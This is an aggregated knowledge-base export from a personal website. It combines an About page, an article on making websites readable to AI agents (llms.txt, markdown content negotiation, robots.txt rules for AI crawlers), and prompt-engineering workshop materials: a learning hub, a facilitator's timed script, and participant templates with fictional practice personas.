# Joey Lopez — Knowledge Base
Generated: 2026-03-26T16:17:02.749163
Base URL: https://jrlopez.dev/
This file aggregates all public knowledge from jrlopez.dev.
Source: index.json (single source of truth)
---
---
# about.md
# https://jrlopez.dev/p/about.html
---
title: "About"
description: "CHSPE → community college → UC Irvine → data engineering → formal proofs via AI agents."
author: "Joey Lopez"
date: "2026-03-25"
tags: ["reference"]
atom_id: 25
source_html: "about.html"
url: "https://jrlopez.dev/p/about.html"
generated: true
---
[← jrlopez.dev ]()
# About I passed the CHSPE at 16, did two years at community college, and transferred to UC Irvine for informatics. After graduating I spent five years in financial services data engineering — building pipelines, ETL systems, and the kind of infrastructure that runs silently until it breaks at 2am. In 2025 I started experimenting with spec-driven AI workflows — giving language models structured specifications instead of open-ended prompts. The methodology worked well enough that I used it to produce a [formal proof ]()that regex-based AI safety filters have an algebraic blind spot. I didn't write the proof by hand. I wrote the specification, built the agent pipeline, and the system generated a result that survived peer review. That changed how I think about what these tools are for. Now I teach the methodology — how to treat prompts as programs, how to build dependency-ordered agent workflows, how to get reliable outputs from unreliable models. Everything on this site came from that same approach: research a problem, formalize the method, build the tooling, then teach it. The [Lattice-Driven Development ]()page explains the framework. The [resume ]()has the professional history. [Book 15 min ]()Joey Lopez · 2026 [.md ]()
---
# agent-first-design.md
# https://jrlopez.dev/p/agent-first-design.html
---
title: "Agent-First Website Design"
description: "Your website has two audiences now. One of them doesn't have eyes. Standards, patterns, implementation."
author: "Joey Lopez"
date: "2026-03-25"
tags: ["methodology", "code", "theory"]
atom_id: 26
source_html: "agent-first-design.html"
url: "https://jrlopez.dev/p/agent-first-design.html"
generated: true
---
[← jrlopez.dev ]()
# Agent-First Website Design Your website has two audiences now. One of them doesn't have eyes. March 2026 Every website built before 2024 was designed for one reader: a human with a browser. That assumption is now wrong. AI agents — coding assistants, research tools, search augmenters — are hitting your pages, and they're getting HTML soup when they need structured text. This isn't a future problem. GPTBot went from 5% to 30% of crawler traffic between May 2024 and May 2025. Over 560,000 sites now have AI-specific entries in their robots.txt. The agents are already here. The question is whether your site is legible to them.
## The Standards Landscape Six competing standards have emerged in 18 months. None has won. Here's the field:
| Standard || What it does || Adoption |
| llms.txt || Markdown site index at root, proposed by Jeremy Howard (fast.ai) || ~10K-844K sites (contested) |
| AGENTS.md || Project guidance for coding agents, donated to Linux Foundation || 60,000+ repos |
| Agent Web Protocol || JSON at /.well-known/agent.jsondeclaring site capabilities || Early |
| Content negotiation || Accept: text/markdown→ server returns markdown || Cloudflare + Vercel |
| IETF aipref || Formal extension to robots.txt for AI usage preferences || Draft RFC |
| Content Signals || Cloudflare's ai-train/ ai-input/ searchin robots.txt || Cloudflare sites |
The uncomfortable truth No LLM provider has confirmed their crawlers actually read llms.txt. Cloudflare's data showed **zero visits **from GPTBot, ClaudeBot, or PerplexityBot to llms.txt pages from August to October 2025. The supply side is building for demand that hasn't materialized in a standardized way.
## What Actually Works (March 2026) If you strip away the standards politics, three things demonstrably help agents consume your content:
### 1. Content Negotiation The most technically mature approach. An agent sends Accept: text/markdown, your server returns clean markdown instead of HTML. Same URL, same content, different format. Cloudflare shipped this at the edge in February 2026 — HTML-to-markdown conversion with zero origin changes. Token reduction: **~80% **(16K tokens in HTML down to 3K in markdown). Vercel built it as Next.js middleware with 99.6% payload reduction. If you're on Cloudflare, flip a switch. If you're on static hosting (GitHub Pages, Netlify), you can't do server-side negotiation. The fallback: serve companion .mdfiles alongside your HTML and link them via .
### 2. Structured Discovery Files Put these at your root:
```
/robots.txt — Who can crawl, AI-specific directives
/llms.txt — Curated site summary for LLMs (Markdown)
/sitemap.xml — Page discovery with dates
/index.json — Structured catalog (your schema)
```
Even if no crawler reads llms.txttoday, it's cheap insurance. The file takes 30 minutes to write and it establishes a machine-readable entry point. When agents do start reading it — and they will, because the alternative is scraping — yours will be there.
### 3. Self-Describing Pages Every page should carry enough metadata that an agent can understand it without external context:
- **JSON-LD structured data **— schema.org/TechArticlewith title, description, author, date, keywords
- **semantic wrapper **— enables Readability.js / Jina Reader extraction
- ****— points to the .mdcompanion
- **YAML frontmatter in .md files **— title, date, tags, source URL An agent hitting any page on your site should be able to determine what it is, who wrote it, when, and what topics it covers — without fetching a separate index.
## The Dual-Format Pattern The architecture I landed on for this site:
```
index.json ← single source of truth (atom catalog)
index.html ← fetches index.json, renders for humans
p/topic.html ← rich interactive page (hand-authored)
p/topic.md ← companion markdown (auto-generated by forge.py)
llms.txt ← curated index for LLMs
llms-full.txt ← concatenated content from all .md files
sitemap.xml ← rebuilt from index.json
robots.txt ← AI crawler permissions
```
The HTML pages are the source of truth — rich, styled, interactive. The .mdfiles are generated derivatives. A build script ( forge.py, ~300 lines, Python stdlib only) extracts content from HTML and generates everything else. A pre-commit hook runs the build + 13 BDD validation scenarios before every commit. The key insight: **your HTML is the product. The agent layer wraps it, never rewrites it. **Don't adopt a static site generator to retrofit markdown-source onto working pages. Don't maintain two copies by hand. Generate the agent-readable format from the human-readable format, automatically.
## The Robots.txt Problem AI crawlers are fragmenting. Both OpenAI and Anthropic now operate three bots each:
| Provider || Training || Search || User-initiated |
| OpenAI || GPTBot || OAI-SearchBot || ChatGPT-User |
| Anthropic || ClaudeBot || Claude-SearchBot || Claude-User |
This lets you block training while allowing search and agentic use. But it also means your robots.txt is getting complex, and compliance is unverifiable — Perplexity was caught using undeclared crawlers with generic user-agent strings to bypass blocking directives. The IETF's aiprefworking group (chartered January 2025) is building a formal extension to the Robots Exclusion Protocol with three usage categories: ai-train, ai-input(RAG/agentic), and search. Cloudflare's Content Signals is the draft implementation. Neither is enforceable — they're preference declarations, not access control.
## What's Coming Predictions, ordered by confidence:
- **Content negotiation wins. **Accept: text/markdownuses existing HTTP infrastructure, requires no new file formats, and Cloudflare's edge conversion removes the adoption barrier. This will be the default way agents read the web.
- **IETF aipref becomes the new robots.txt. **The three-signal model (train/input/search) will be an RFC within 18 months. Cloudflare's Content Signals is the implementation.
- **llms.txt becomes niche. **Useful for documentation sites, but eclipsed by content negotiation which works on every page.
- **The trust problem gets worse. **Without cryptographic agent identity, publishers will block aggressively, pushing agents toward browser automation — the opposite of the cooperative vision.
## Implementation Checklist If you're building or maintaining a website today, do these in order:
- **Wrap content in tags **— one-line edit per page, enables reader-mode extraction
- **Add JSON-LD structured data **— schema.org/Articlewith title, description, date, author
- **Write a robots.txt**with AI crawler directives — allow what you're comfortable with
- **Write a llms.txt**— curated markdown summary of your site's content
- **Generate .mdcompanions **for your HTML pages — link via
- **If on Cloudflare: **enable Markdown for Agents (one toggle)
- **If self-hosting: **build a script to generate agent-readable formats from your HTML Total effort for a 20-page static site: one afternoon. This site is the reference implementation — [llms.txt ](), [index.json ](), and every page has a [.md companion ]().
## Sources
- [llmstxt.org ]()— The /llms.txt spec (Jeremy Howard, fast.ai)
- [Cloudflare: Markdown for Agents ]()— Edge-level content negotiation (Feb 2026)
- [Checkly: State of AI Agent Content Negotiation ]()— Which agents actually negotiate
- [Vercel: Agent-Friendly Pages ]()— Middleware implementation
- [IETF aipref Working Group ]()— Formal robots.txt extension
- [Content Signals ]()— Cloudflare's ai-train/ai-input/search spec
- [Agent Web Protocol ]()— Action-discovery standard
- [Cloudflare: Who's Crawling Your Site ]()— GPTBot 5%→30% traffic surge
- [Linux Foundation: AAIF + AGENTS.md ]()Joey Lopez · 2026 [.md ]()
---
# ai-learning-hub.md
# https://jrlopez.dev/p/ai-learning-hub.html
---
title: "AI Learning Hub"
description: "Guided path: why AI → tools → patterns → pick your track."
author: "Joey Lopez"
date: "2026-03-22"
tags: ["prompting", "teaching"]
atom_id: 6
source_html: "ai-learning-hub.html"
url: "https://jrlopez.dev/p/ai-learning-hub.html"
generated: true
---
[← home ]()[start here ]()[tracks ]()[tools ]()[sessions ]()[workshop ]()Prompt Engineering & Tooling
# AI Learning Hub Context is everything. Structure gets rewarded. You are the retrieval system. Joey Lopez · Sr. Data Engineer [start here ]()[why AI? ]()[tool landscape ]()[pick your track ]()[sessions ]()4 tracks 5 skills 90 min live + self-paced maintained 2026 Start Here
## Four steps, then you're off Whether you're brand new or have been prompting for a year, this path covers the foundation before branching into role-specific work. 01
#### Why AI? What it actually does well, what changes for your role, and why prompting is closer to programming than talking. [read it here ]()02
#### Pick Your Tool Chat assistant, code completion, AI-native editor, or agentic IDE — don't overthink it, but know the difference. [tool landscape ]()03
#### Learn the Patterns Zero-shot, few-shot, chain-of-thought, ReAct, Tree of Thoughts — foundations and advanced patterns, with a second brain framework. [prompting patterns ]()04
#### Pick Your Role Track Dev, PO/PM, Delivery Lead, Tech Lead, or capstone. Role-specific workflows built on the same underlying patterns. [choose a track ]()Why AI? Why Should I Care?
## Before you learn the patterns, orient yourself Three things worth internalizing before you touch a prompt library or install a tool. What AI actually does well
#### The tasks where it earns its keep
- Drafting first passes on anything text-shaped (emails, docs, PRDs, summaries)
- Transforming content — reformatting, translating register, restructuring arguments
- Recognizing patterns in messy inputs (logs, feedback, transcripts)
- Writing boilerplate and scaffolding you'd otherwise copy-paste
- Rubber-ducking your own thinking — externalizing and stress-testing ideas What changes for your role
#### The same tool, different leverage points Developer Specs and test cases arrive faster than code. The bottleneck shifts to review and integration, not generation. PO / PM User stories with Given/When/Then, sprint backlogs, and roadmap rationales in seconds instead of hours. Delivery Lead Risk matrices, status reports, and onboarding plans generated from your notes — you edit, not author. Tech Lead Run parallel architecture evaluations, generate ADRs via Tree of Thoughts, and build metaprompts that amplify your whole team. The mental model shift
#### Prompting is programming A prompt isn't a request. It's a program. The same engineering principles that make code maintainable make prompts effective. In code Database In a prompt *Context *Why it matters What you include determines what the model can retrieve In code Schema In a prompt *Structure *Why it matters Format and constraints shape the output space In code Query / retrieval In a prompt *You *Why it matters You decide what enters the context — that is the skill Tool Landscape
## Four categories of AI tooling Most people start with whatever's available and upgrade when they hit a ceiling. That's the right move. Here's what the categories actually mean.
| || Chat Assistant || Code Completion || AI-Native Editor || Agentic IDE |
| What it is || Conversational interface for open-ended prompting e.g. ChatGPT, Claude.ai, Copilot Chat || Inline suggestions as you type, trained on code e.g. GitHub Copilot, Tabnine, Codeium || Editor with deep AI integration — inline editing, codebase awareness e.g. Cursor, Windsurf || Agent that reads, edits, and runs code autonomously across files e.g. Claude Code, Devin, Copilot Workspace |
| Best for || Drafting, explaining, brainstorming, non-code tasks || Speeding up typing in familiar codebases; boilerplate || Refactoring, multi-file edits, test generation, codebase Q&A || Large refactors, new features with specs, automated review loops highest leverage |
| Primary users || Everyone — all roles benefit || Developers (and technically-minded POs/TLs) || Developers who want more than autocomplete || Senior devs and tech leads comfortable giving AI significant scope |
| Context window || Single conversation; loses context across sessions || Current file + a few nearby files || Whole codebase via embeddings or selection significant upgrade || Repo-wide; can run commands, read logs, write tests maximum scope |
| Learning curve || Low — natural language interface start here || Low-medium — mostly passive until you learn to steer it start here || Medium — new prompting patterns, composer mode, rules files || High — requires spec discipline and trust calibration graduate when ready |
| When to start || Day one — use it for anything you'd Google || Week one if you write code regularly || When you're writing AI-assisted features or doing large refactors || When you can write a spec that an agent can execute without babysitting |
Don't overthink tool choice. Start with what's available, graduate when you hit limits. Pick Your Track
## Five role-specific skill files Each track is a complete, production-relevant workflow — not a tutorial. You get a skill file you can actually run. [Developer 💻
#### Developer Second Brain ReAct-driven migrations, refactoring, feature implementation, and systematic debugging with annotated diffs. ]()[PO / PM 📊
#### PO/PM Second Brain User stories with Given/When/Then, sprint backlogs, roadmap prioritization, and executive reporting. ]()[Delivery Lead 📋
#### Delivery Lead Second Brain ABCD priority building, risk matrices, client status reports, and phased onboarding — all system-ready. ]()[Tech Lead 🏗️
#### Tech Lead Second Brain ADRs via Tree of Thoughts, metaprompts for team amplification, spike plans, and .cursorrules generation. ]()[Capstone 🔨
#### Make Skills Turn any repeated weekly task into a structured skill file. Discover, extract the pattern, generate. Every skill is a RAG system. ]()Sessions & Reference
## Materials for the live workshop Self-study first, then the live sessions, then keep the reference cards close. 📋
#### Common Knowledge 15-minute self-study. Complete before the live session to align on foundational concepts and vocabulary. [Prereq materials ]()🎤
#### Session 1 — Patterns & Priority Builder 60 min. Three Approaches Framework, foundational patterns, and a hands-on priority builder exercise. [Session 1 ]()🎯
#### Session 2 — Advanced Patterns & Interview Prep 60 min. ReAct, Tree of Thoughts, and a complete interview preparation workflow using spec-kit methodology. [Session 2 ]()⚡
#### Quick Reference Cards Pattern recognition guide and decision tree for rapid lookup during practice. Printable and screen-friendly. [Quick reference ]()Go Deeper
## When you want more than the workshop covers
#### Advanced Patterns Self-consistency, constitutional AI, chain-of-density, structured generation, and evaluation loops. [prompting-advanced ]()
#### Prompt Cheat Sheet Composition patterns, operator reference, and the scaffolding primitives behind every skill file. [cheat sheet ]()
#### Diagrams as Prompts Using Mermaid diagrams as structured reasoning inputs. Why pictures beat paragraphs for complex specs. [mermaid prompts ]()
#### Lattice-Driven Dev Dependency-ordered development methodology. Build L1 before L2, verify before shipping each layer. [lattice dev ]()Workshop Delivery
## For facilitators Session structure, timing, and materials for running the live workshop. Session flow & facilitator notes ▼
### Session flow — 105 min total 15 min Prereq Self-study before the call 15 min Activation Framing & three intuitions 40 min Role Fork Role-specific deep dive with skill file 20 min Capstone Build your own skill 10 min Close Synthesis & next steps 📚
#### Facilitator Guide v2 Minute-by-minute script, timing notes, failure modes, and contingency plans for delivery. [Facilitator guide ]()👥
#### Participant Materials Decision matrices, demo personas, spec-kit templates, and workshop completion checklist. [Participant materials ]()
### v2 improvements
- **Faster **— 90 min instead of 120 (still covers more ground)
- **Role-specific **— four parallel tracks instead of one generic path
- **Agency **— participants build their own skill file in the capstone
- **Lower entry friction **— 15-min prereq removes baseline alignment overhead from live time
- **Production-grounded **— examples drawn from real project patterns, not textbook exercises Joey Lopez · 2026 · [jrlopez.dev ]()· [← home ]()· [guardrails → ]()[.md ]()
---
# bootcamp-facilitator.md
# https://jrlopez.dev/p/bootcamp-facilitator.html
---
title: "Facilitator Guide"
description: "Minute-by-minute script for running the workshop."
author: "Joey Lopez"
date: "2026-01-18"
tags: ["prompting", "teaching"]
atom_id: 12
source_html: "bootcamp-facilitator.html"
url: "https://jrlopez.dev/p/bootcamp-facilitator.html"
generated: true
---
[← home ]()[bootcamp ]()[S1 setup ]()[S1 flow ]()[S2 setup ]()[S2 flow ]()[success metrics ]()
# Facilitator Guide Minute-by-minute timing, file usage, and coaching notes for professional workshop delivery Joey Lopez · Prompt Engineering Bootcamp · Internal use [session 1 setup ]()[session 1 flow ]()[session 2 setup ]()[session 2 flow ]()[success metrics ]()Session 1
## Pre-Session 1 Setup (15 minutes before start)
- Demo persona descriptions open and ready to share screen (3 personas visible)
- Priority Builder Agent prompt (325 lines) copied to clipboard for AI tool demo
- Session 1 slides opened and tested (diagrams displaying correctly)
- AI tool open — ChatGPT or Claude with a fresh session
- Quick reference cards available for participants (print or digital) Session 1 — Minute by Minute
## Session 1: Industry Standards (60 minutes) 0–5 min Problem & Solution Overview
#### Materials None — pure presentation. Energy check. 0:00 — Welcome, energy check, agenda overview
0:02 — "How many use AI tools daily?" (show of hands)
0:03 — Show problem slide: "Let's see if this sounds familiar..."
0:04 — Build energy: "Today you'll learn systematic approaches"
0:05 — Transition: "First, let me show you three valid approaches" **Goal: **High energy, validate pain points. Don't solve the problem yet. 5–15 min Three Approaches Framework
#### Materials Three Approaches diagram on screen. 5:00 — Show Three Approaches diagram
5:01 — Green path: "Most teams start here — ADRs + Config"
5:03 — Orange path: "Learning teams benefit from Structured"
5:05 — Yellow path: "Platform-committed teams use Tool-Assisted"
5:07 — Hands: "Who uses multiple AI tools?" → Point to green
5:09 — Hands: "Who wants to learn systematic prompting?" → Point to orange
5:11 — Hands: "Who's committed to one IDE like Cursor/Windsurf?" → Yellow
5:13 — Key insight: "All valid — choose based on team context"
5:15 — Transition: "Before we try this, let's see the foundational patterns" **Interaction: **Point, trace paths, ask team context questions. Don't rush. 15–20 min Foundational Patterns
#### Materials Foundational Patterns diagram. Preview priority-builder prompt (mention it uses all 4 patterns). 15:00 — Show Foundational Patterns diagram
15:01 — Trace flow: "Persona establishes expertise..."
15:02 — "Few-shot shows desired format..."
15:03 — "Template structures the output..."
15:04 — "Chain-of-Thought reveals reasoning..."
15:05 — Quick interaction: "Where have you seen these before?"
16:00 — "In 5 minutes, you'll see all 4 patterns in a 325-line system"
17:30 — Transition slide to hands-on 20–25 min Demo: Priority Builder
#### Critical File Sequence
- Open demo personas on screen — show "Option B: Tech Lead"
- Switch to AI tool with Priority Builder prompt pasted
- Point out pattern locations: "Lines 1–4 are Persona, lines 200–220 Few-shot..."
- Start 20 Questions — let AI ask 3–4 questions
- Answer as Tech Lead persona: "AI/ML specialist, banking automation..."
- Generate output — show CSV + formatted versions 20:00 — "I'll demo using a safe practice persona"
20:30 — OPEN persona descriptions on screen
21:00 — Point to Tech Lead: "5 years, AI/ML specialist, current projects..."
22:00 — "Now watch all 4 patterns in action"
22:15 — SWITCH to AI tool with prompt loaded
23:00 — Start 20 Questions, answer as Tech Lead
24:00 — Generate output: show CSV + formatted versions
24:30 — "Notice systematic vs ad-hoc difference"
25:00 — Transition: "Your turn — start with freestyle"
- Participants see clear persona usage
- AI generates realistic CSV output
- All 4 patterns demonstrated and named
- Systematic vs ad-hoc contrast is obvious 25–35 min Exercise: Freestyle First
#### Materials Demo persona descriptions on screen for participant reference. 25:00 — "Choose a DIFFERENT persona from the demo"
25:30 — Show personas on screen again
26:00 — "Create 1 priority using your normal prompting approach"
26:30 — Circulate, observe struggles
27:00 — Coach lightly: "What metrics could you include?"
29:00 — Watch for pain points: vague results, generic language
30:00 — "2 more minutes"
32:00 — Quick debrief: "How many got output you'd submit to a manager?"
33:00 — "Most struggled with specificity — let's try systematic approach"
35:00 — Transition: "Now use Priority Builder methodology"
#### Coaching note Don't help too much during freestyle. Let them feel the pain. Take mental notes of specific struggles for the debrief — the contrast will land harder. 35–50 min Exercise: Priority Builder Template
#### Critical File Sequence
- Participants copy/paste Priority Builder prompt into their AI tool
- Switch to different persona than freestyle round
- Guide through 20 Questions process 35:00 — "Everyone load the Priority Builder prompt"
35:30 — Verify: "Can you see the full 325-line prompt?"
36:00 — "Pick DIFFERENT persona from freestyle round"
36:30 — Walk around: ensure prompt loaded correctly (common paste issues)
37:00 — "Let the AI ask you questions — answer as your persona"
37:30 — Coach: "Be specific about projects and metrics"
40:00 — Watch for systematic vs ad-hoc differences emerging
42:00 — "Generate your priority — pick Conservative, Balanced, or Aspirational"
44:00 — "Anyone getting CSV output? That's ready for submission"
46:00 — Celebrate: "Show of hands who got specific metrics"
48:00 — Quick sharing: "What's one metric you wouldn't have thought of?"
50:00 — Transition: "Let's compare the three approaches" **Heavy coaching required here. **Ensure prompts load, guide specific persona-based answers, celebrate systematic outputs vs earlier freestyle struggles. 50–55 min Compare: Three Approaches 50:00 — "Same Spring migration, 3 different approaches"
50:30 — Show ADRs approach: simple prompt referencing standards doc
51:00 — Show Structured approach: multi-file systematic workflow
52:00 — Show Tool-Assisted: Windsurf 290-line cascade
53:00 — "Notice: same result, different maintenance overhead"
54:00 — Quick poll: "Which fits your team's style?"
55:00 — Transition to insights 55–60 min Insights & Session 2 Preview 55:00 — "What did you observe? Freestyle vs Priority Builder?"
55:30 — Capture insights: "Systematic = specific, ad-hoc = generic"
56:00 — "For Session 2: same patterns for interview prep"
56:30 — Preview job descriptions: "4 realistic senior roles available"
57:00 — "Bring: chosen job + same persona for continuity"
58:00 — Session 2 preview: "ReAct + Tree of Thoughts in action"
59:00 — "Questions before 5-minute break?"
60:00 — End Session 1 Session 2
## Pre-Session 2 Setup
- Job descriptions (4 options) open and visible
- Demo persona descriptions — same personas from Session 1
- Interview prep 4-file workflow templates ready
- Spring migration files loaded for live Java demo
- Session 2 slides tested Session 2 — Minute by Minute
## Session 2: Advanced Patterns (60 minutes) 0–5 min Recap + Advanced Patterns Overview 0:00 — "Session 1 quick wins — who got CSV output?"
0:30 — "Today: same patterns for complex reasoning"
1:00 — Energy check: "Ready to level up?"
2:00 — "Advanced patterns: ReAct + Tree of Thoughts + live Java demo"
3:00 — "Goal: systematic methodology across ALL domains"
5:00 — Ready for advanced patterns 5–15 min Spec-Kit + ReAct + Tree of Thoughts 5:00 — Show Spec-Kit diagram
5:30 — Point to knowledge-base: "Reusable domain expertise"
6:00 — Point to specification: "This task's specific requirements"
7:00 — Point to implementation-plan: "Where ReAct + Tree of Thoughts live"
8:00 — "Key advantage: separation of concerns"
10:00 — Show ReAct + Tree diagram
10:30 — Trace ReAct flow: "Think → Act → Observe"
11:00 — Show Tree of Thoughts: "Generate → Evaluate → Choose"
12:30 — Interactive: "How would you analyze job requirements?"
15:00 — Transition: hands-on time 15–25 min Demo: Interview Prep Workflow
#### Critical File Sequence
- Open job descriptions — show "Senior Manager AI Strategy" role
- Use same Tech Lead persona from Session 1
- Load interview prep 4-file workflow live 15:00 — "Interview prep using same Tech Lead persona from priorities"
15:30 — OPEN job descriptions, show Senior Manager AI Strategy role
16:00 — "Notice: 8+ years experience, $5M budget, C-level presentations"
16:30 — "Our Tech Lead: 5 years, AI specialist, no big budget experience"
17:00 — "Watch systematic gap analysis"
18:00 — Live spec creation: role details + background analysis
19:00 — Execute ReAct: "Think: Gap in budget management experience"
19:30 — "Act: Position as technical depth with business impact"
20:00 — "Observe: Need evidence of strategic thinking"
20:30 — Tree of Thoughts: 3 strategies: Technical Expert, Strategic Leader, Bridge
21:30 — Choose strategy: "Bridge Role — technical depth + business growth"
22:00 — Generate materials: positioning statement + STAR examples
23:00 — "Notice: systematic vs random interview prep"
25:00 — Transition to exercise
- Clear job analysis demonstrated
- ReAct pattern execution visible and named
- Tree of Thoughts evaluation shown with explicit tradeoffs
- Systematic positioning strategy emerges visibly 25–40 min Exercise: Build Interview Strategy
#### File Coordination Participants pick a different job than the demo. Use the same persona from Session 1 priorities. 25:00 — "Everyone open job descriptions"
25:30 — "Pick DIFFERENT job than AI Strategy demo"
26:00 — "Options: Banking Consultant, Retail Director"
26:30 — "Use SAME persona from Session 1 for continuity"
27:00 — "Phase 1: Create specification.md"
27:30 — Coach: "Document job requirements vs your persona background"
28:00 — "What's the biggest gap?"
30:00 — "Phase 2: ReAct analysis"
30:30 — Guide: "THINK about positioning options"
31:00 — "ACT: Map specific experience to requirements"
31:30 — "OBSERVE: What positioning emerges?"
32:00 — "Tree of Thoughts: generate 3 positioning strategies"
33:00 — Coach: "What are pros/cons of each?"
34:00 — "Which has lowest risk?"
35:00 — "Generate positioning statement + 2 STAR examples"
38:00 — Celebrate: "Who has clear positioning strategy?"
40:00 — Transition: "Same patterns in technical work"
#### Intensive coaching required
- Guide explicit ReAct structure — many participants skip steps
- Force specific evidence for positioning claims, not assertions
- Help evaluate tradeoffs between strategies explicitly
- Ensure STAR examples are specific, not generic 40–55 min Live Java Demo: Spring Migration
#### Materials Screen share Spring migration repository. Cross-Domain Patterns diagram. 40:00 — "Same systematic patterns for technical work"
40:30 — Show Cross-Domain diagram: "Universal patterns across domains"
41:00 — SCREEN SHARE Spring migration files
41:30 — "Three approaches to same migration challenge"
42:00 — Show ADRs approach: .github/copilot-instructions.md
42:30 — "Simple prompt: 'Follow migration standards, update UserController'"
43:00 — Show Structured approach: spec/ folder workflow
44:30 — Execute live: Load files in AI tool, generate migrated code
46:00 — Point out ReAct: "Think dependencies → Act on imports → Observe compile"
47:00 — Show Tool-Assisted: Windsurf 290-line cascade
48:00 — "Built-in systematic validation at each step"
49:30 — "Same patterns: priorities → interviews → code"
51:00 — "ReAct works everywhere: Think → Act → Observe"
53:00 — Interactive: "Where else could you apply these patterns?"
55:00 — Transition to wrap-up
- Clear pattern recognition across domains visible
- Live code generation working in real time
- "Aha moment" — universal patterns click for participants 55–60 min Integration + Next Steps 55:00 — "What patterns did you recognize across domains?"
55:30 — Capture: "Same ReAct, different applications"
56:00 — "This week: apply ReAct to one work decision"
56:30 — "Use Tree of Thoughts for next strategic choice"
57:30 — Show quick reference cards: "Take this for ongoing use"
58:00 — "Goal achieved: systematic vs ad-hoc methodology"
58:30 — "Questions? Discussion? Applications?"
60:00 — End workshop Evaluation
## Workshop Success Metrics
#### Session 1
- 80%+ generate CSV-ready priorities
- Clear systematic vs ad-hoc recognition
- Proper persona usage throughout
- Understanding of Three Approaches decision framework
#### Session 2
- ReAct analysis executed properly (steps named)
- Tree of Thoughts with explicit tradeoff rationale
- Pattern recognition across business + technical domains
- Confidence applying methodology to their own work
#### Overall
- Real deliverables created (priorities + interview materials)
- Systematic methodology internalized
- Cross-domain pattern recognition achieved
- Concrete action plans for ongoing application Joey Lopez · 2026 · [jrlopez.dev ]()
[← home ]()· [bootcamp overview ]()· [session 1 ]()· [session 2 ]()· [participant materials ]()· [quick reference ]()[.md ]()
---
# bootcamp-prereq.md
# https://jrlopez.dev/p/bootcamp-prereq.html
---
title: "Bootcamp Prereq"
description: "15-minute self-study before the live session."
author: "Joey Lopez"
date: "2026-01-10"
tags: ["prompting", "teaching", "reference"]
atom_id: 8
source_html: "bootcamp-prereq.html"
url: "https://jrlopez.dev/p/bootcamp-prereq.html"
generated: true
---
[← home ]()[bootcamp ]()[decision matrix ]()[personas ]()[templates ]()[checklist ]()
# Participant Materials Reference cards, demo personas, and workflow templates for the Prompt Engineering Bootcamp Joey Lopez · Prompt Engineering Bootcamp [decision matrix ]()[personas ]()[templates ]()[research ]()[checklist ]()Frameworks
## Three Approaches Decision Matrix
| When to Use || ADRs + Config || Structured Files || Tool-Assisted |
| **Team Size ** || Any size || 5–15 people || Committed to one tool |
| **Task Type ** || Simple–Medium || Complex, repeated || IDE-integrated work |
| **Maturity ** || Proven (Tier 1) || Experimental (Tier 3) || Varies (Tier 2–3) |
| **Maintenance ** || Low || Medium || Low (tool manages) |
| **Examples ** || .github/copilot-instructions.md || Priority Builder (325 lines) || Windsurf workflows |
| **Time to Setup ** || 15 minutes || 1–2 hours || 30 minutes |
| **Best For ** || Most teams || Learning, complex tasks || Platform-specific teams |
## Foundational Patterns Reference
| Pattern || Template || When to Use |
| **Persona ** || "You are an expert [role] with [expertise]..." || Need specialized knowledge |
| **Few-shot ** || "Example 1: Input → Output" || Want consistent format |
| **Template ** || "Respond in this format: [structure]" || Need structured output |
| **Chain-of-Thought ** || "Show your reasoning step by step" || Complex problem solving |
## Advanced Patterns Reference
| Pattern || Structure || When to Use |
| **ReAct ** || Think → Act → Observe → Think... || Multi-step tasks with validation |
| **Tree of Thoughts ** || Generate options → Evaluate → Choose || Decision points with tradeoffs |
| **Spec-Kit ** || knowledge-base → specification → implementation || Complex, repeated tasks |
Practice Material
## Demo Personas for Safe Practice Use these fictional profiles during exercises to avoid putting real client or personal information into AI tools.
#### Persona A — Delivery Lead, Financial Services
- **Experience: **8 years, manages 12-person team
- **Current Project: **Digital transformation for regional bank ($2.3M, 18 months)
- **Accomplishments: **Delivered 3 weeks early, NPS 6.5→8.2, team engagement 4.1/5.0
- **Skills: **Agile/Scrum Master, AWS Cloud Practitioner, stakeholder management Best for: Client Value Creation or Great Place to Work priority exercises
#### Persona B — Tech Lead, Banking Automation
- **Experience: **5 years, AI/ML specialist
- **Current Project: **Banking automation (1,500 datasets processed, 6x speed improvement)
- **Accomplishments: **4 POC demos to Senior Managers, 1 advanced to $800K pitch
- **Skills: **Python, AI tools (Copilot, Windsurf), spec-driven development Best for: AI Enablement or Client Value Creation exercises
#### Persona C — Associate Manager, Digital Strategy
- **Experience: **6 years, MBA hire, manages 5 people
- **Current Project: **Organizational redesign ($12M savings, 85% adoption rate)
- **Accomplishments: **Client satisfaction 9.1/10, innovation award, board presentation
- **Skills: **Change management, AI workforce planning, thought leadership Best for: Great Place to Work or Community exercises Sample Job Descriptions
## Jobs for Interview Prep Exercises
#### Job A — Senior Manager, AI Strategy
- **Company: **Fortune 500 Financial Services
- **Role: **Develop enterprise AI strategy and lead client-facing transformations
- **Requirements: **8+ years consulting, 3+ in AI/digital, $2M+ engagement leadership
- **Team: **6 direct reports, 20+ indirect
#### Job B — Principal Consultant, Banking Technology
- **Company: **Big 4 Consulting Firm
- **Role: **Lead core banking modernization and cloud-native architecture projects
- **Requirements: **7+ years banking technology, cloud expertise, CTO/CIO relationships
- **Team: **Lead 10–15 person engagement teams
#### Job C — Director, Digital Transformation
- **Company: **Fortune 100 Retail Company
- **Role: **Internal transformation leader for AI-enabled operations
- **Requirements: **10+ years transformation experience, P&L responsibility, executive presence
- **Team: **Multiple cross-functional teams (50+ people) Templates
## Spec-Kit Workflow Templates
### knowledge-base.md
```
# Interview Knowledge Base
## STAR Method Framework
- **Situation**: Context and background
- **Task**: What needed to be accomplished
- **Action**: Steps you took (focus on YOUR actions)
- **Result**: Outcome and impact (quantified when possible)
## Common Senior Manager Questions
1. "Tell me about a time you led a complex project"
2. "How do you handle competing stakeholder priorities?"
3. "Describe your approach to building teams"
4. "Give an example of driving strategic change"
5. "What's your experience with digital/AI transformation?"
## Positioning Strategy Options
- **Technical Expert**: Emphasize deep functional skills
- **Strategic Leader**: Focus on business impact and vision
- **Balanced Bridge**: Demonstrate both technical depth and business acumen
```
### specification.md
```
# Interview Specification
## Target Role Details
- **Position**: [Role title]
- **Company**: [Company name and industry]
- **Key Requirements**: [Must-have qualifications]
- **Team/Scope**: [Management responsibilities]
## Candidate Background
- **Current Role**: [Your position and experience]
- **Key Projects**: [2-3 most relevant projects]
- **Notable Achievements**: [Quantified results]
- **Skills Gap Analysis**: [What you're missing vs what you have]
## Success Criteria
- [What good positioning looks like for this role]
- [Key messages to convey]
- [Questions to ask that show strategic thinking]
```
### implementation-plan.md
```
# Interview Implementation Plan
## Phase 1: ReAct Analysis
**THINK**: What positioning strategy best fits this role + my background?
**ACT**: Map my experience to role requirements systematically
